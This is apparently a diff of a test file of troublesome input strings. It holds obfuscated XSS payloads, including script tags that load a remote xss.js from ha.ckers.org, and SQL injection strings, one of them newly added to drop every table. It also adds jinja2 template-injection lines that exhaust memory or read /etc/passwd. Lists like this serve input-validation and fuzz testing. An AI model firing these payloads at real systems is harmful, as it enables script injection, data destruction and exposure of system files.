<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#50;&#49;&#49;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000050&#0000049&#0000050&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x32&#x31&#x33&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('214');">
<IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('215');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('216');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('217');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out perl -e 'print "<IMG SRC=java\0script:alert(\"218\")>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');"> <IMG SRC=" &#14; javascript:alert('219');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("220")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT> <<SCRIPT>alert("221");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j> <SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')" <IMG SRC="javascript:alert('222')"
<iframe src=http://ha.ckers.org/scriptlet.html < <iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');// \";alert('223');//
<u oncopy=alert()> Copy me</u> <u oncopy=alert()> Copy me</u>
<i onwheel=alert(1)> Scroll over me </i> <i onwheel=alert(224)> Scroll over me </i>
<plaintext> <plaintext>
http://a/%%30%30 http://a/%%30%30
</textarea><script>alert(123)</script> </textarea><script>alert(225)</script>
# SQL Injection # SQL Injection
# #
...@@ -572,6 +587,7 @@ http://a/%%30%30 ...@@ -572,6 +587,7 @@ http://a/%%30%30
1'; DROP TABLE users-- 1 1'; DROP TABLE users-- 1
' OR 1=1 -- 1 ' OR 1=1 -- 1
' OR '1'='1 ' OR '1'='1
'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --
% %
_ _
...@@ -710,3 +726,17 @@ The quick brown fox... [Beeeep] ...@@ -710,3 +726,17 @@ The quick brown fox... [Beeeep]
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
🏳0🌈️ 🏳0🌈️
జ్ఞ‌ా జ్ఞ‌ా
# Persian special characters
#
# This is a four characters string which includes Persian special characters (گچپژ)
گچپژ
# jinja2 injection
#
# first one is supposed to raise "MemoryError" exception
# second, obviously, prints contents of /etc/passwd
{% print 'x' * 64 * 1024**3 %}
{{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment